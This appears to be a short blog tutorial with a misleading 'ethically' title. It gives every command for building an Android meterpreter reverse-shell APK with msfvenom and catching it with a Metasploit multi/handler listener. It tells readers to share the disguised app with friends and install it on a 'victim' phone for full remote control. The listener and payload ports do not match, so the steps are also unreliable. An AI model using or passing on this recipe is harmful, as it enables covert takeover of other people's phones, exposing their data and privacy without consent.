-->

How To Remotely Control Any Android Phone Using Kali Linux Ethically




First install kali linux, If you don't know how to download and install kali linux please search on google.

after install kali linux update all tools also full OS. Then open terminal follow the commends:

1. type : msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT= 4444 R>( Name Of App).apk
wait few second
1%2Bhack%2Bandroid

2. Here you can see your apk venom now share this apk file with your friends for testing.

2%2Bhack%2Bandroid

3. After That type: msfconsole

3hack%2Bandroid

4. Then type: use multi/handler

4hack%2Bandroid

5. Then type: set payload android/meterpreter/reverse_tcp

5-hack%2Bandroid

6. Now Set Lhost type: set LHOST (your ip address)

6-hack%2Bandroid


7.  Now Set lport type: set LPORT 444

7-hack%2Bandroid

8.   Then type : exploit

8-hack%2Bandroid

9. Ok Everyone done install this app in you victim mobile, enter exploit open app, mobile in you control you can do everything with this mobile finally type help for more commend type : help

10

Hope you loved this feel free to comment here



Also Read

Post a Comment